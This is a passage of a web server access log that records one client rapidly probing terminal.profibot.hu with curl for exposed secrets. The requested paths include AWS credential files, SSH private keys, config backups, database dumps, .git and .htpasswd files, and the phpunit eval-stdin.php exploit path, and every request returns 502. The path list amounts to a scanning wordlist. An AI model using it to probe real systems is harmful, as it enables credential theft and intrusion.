-] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/connection.php.bak" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/conn.php.bak" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/conn.asp.bak" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/connection.asp.bak" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/config.jsp.bak" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/config.ini.bak" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/config/config.inc.php.bak" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/config/config_ucenter.php.bak" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/config/config_global.php.bak" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/bitrix/php_interface/dbconn.php.bak" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/uc_server/data/config.inc.php.bak" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/data/config.inc.php.bak" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/var/debug.log" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/content/debug.log" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/npm-debug.log" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/yarn-debug.log" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/firebase-debug.log" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/debug.txt" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/debug.txt.gz" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/debug.tar.gz" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/debug.zip" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/debug.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/debug.sql.tar.gz" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/debug.sql.zip" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/mysql_debug.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/root/.aws/credentials" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/.aws/secret_access_key.txt" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/.aws/s3/config.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/.aws/config.yaml" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/.aws/secrets/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/.aws/secretsmanager/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/config.php.old" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/config.inc.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/config.json.bak" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/config.yml" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/config.js.bak" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/config/settings.local.yml" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/config.local" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/config.local.php_old" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/config.inc" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/config.properties" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/appsettings.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/connectionstrings.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/settings.php.bak" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/settings.php.old" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/settings.php.save" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/app/config/parameters.yml" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/composer.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/package.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/debug.xml" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/debug-output.txt" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/php.log" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/build.log" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/scripts/phpinfo.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/tmp/phpinfo.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/symfony/_profiler/phpinfo" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/webdav/phpinfo.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/php-information" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/tools/phpinfo.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/start.sh" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/run.sh" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/build.sh" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/startup.sh" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/cron.sh" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/aws-credentials.sh" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/configure.sh" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/service.pwd" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/service.grp" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/server.sh" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/configuration.php.bak" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/app/etc/local.xml.bak" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/database.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/mysql.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/backup.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:16 +0000] - - 502 - GET https terminal.profibot.hu "/site.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/wordpress.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/server-status/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/server-info.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/app_dev.php/_profiler/open?file=app/config/parameters.yml" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/storage/oauth-private.key" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/storage/oauth-public.key" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/storage/logs/stack.log" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/storage/debug.log" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/bootstrap/app.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/config/auth.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/config/filesystems.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/config/queue.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/config/session.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/config/view.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/config/logging.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/config/broadcasting.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/resources/views/errors/500.blade.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/resources/views/errors/404.blade.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/resources/views/welcome.blade.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/_debugbar/open" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/debugbar" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/xdebug.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/xdebug_info.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/vendor/symfony/debug/debug.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/vendor/composer/installed.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/vendor/autoload.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/vendor/.env.example" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/artisan" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/test_socket.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/testdb.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/errors.log" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/config.old" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/export.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/adminer-4.2.5-mysql-en.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/phpmyadmin.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/phpmyadmin/index.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:17 +0000] - - 502 - GET https terminal.profibot.hu "/phpmyadmin/setup/index.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/sql.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/sqladmin.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/dbadmin.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/phpminiadmin.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/mysqladmin.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/backup/database.zip" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/database.zip" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/dump.tar.gz" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/data.tar.gz" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/backup.tar" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/app.tar.gz" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/database.tar.gz" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/db_backup.zip" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/database_backup.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/.config/config.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/.docker/config.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/.settings.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/node_modules/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/vendor/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/tmp/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/core/config.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/core/config.bak" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/api/config.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/wp-config-sample.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/wordpress/wp-config.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/wordpress/wp-config-sample.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/.git/HEAD" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/.svn/entries" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/.hg/hgrc" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/.DS_Store" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/.htpasswd" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/.bash_history" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/.bashrc" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/id_rsa" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/id_rsa.pub" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/key.pem" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to 